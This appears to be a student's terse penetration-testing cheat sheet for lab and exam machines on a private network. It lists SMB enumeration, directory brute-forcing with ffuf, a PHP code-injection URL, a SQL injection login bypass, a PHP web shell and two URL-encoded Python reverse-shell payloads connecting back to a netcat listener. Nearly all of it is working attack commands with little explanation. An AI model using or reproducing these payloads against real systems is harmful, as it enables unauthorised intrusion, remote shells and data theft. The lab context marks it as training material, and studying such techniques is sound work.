smbclient -L //192.168.107.133 -N 
smbclient //192.168.107.133/reports -N
ls
get staff.txt
get notes.txt
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc pete@192.168.107.133


Lab 4
Directory BruteForce
sudo apt update && sudo apt install ffuf -y

ffuf -u http://<CHANGE TO YOUR TARGET IP>/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php,.html,.txt -mc 200,204,301,302

#exploit
http://192.168.107.134/index.php?page=index%27);echo%20system(%27hostname%27);//

#listener (open a new terminal)
nc -nlvp 4444


#Run on browser 
http://192.168.107.134/index.php?page=index%27)%3B%24%7Bsystem(%27python%20-c%20%5C%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.107.129%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%5C%27%27)%7D%3B%23


#Exam2
http://192.168.107.135/admin
1' OR '1'='1';-- 

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

http://192.168.107.135/admin/logs.php?cmd=whoami

?cmd=%20python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.107.129%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)' 

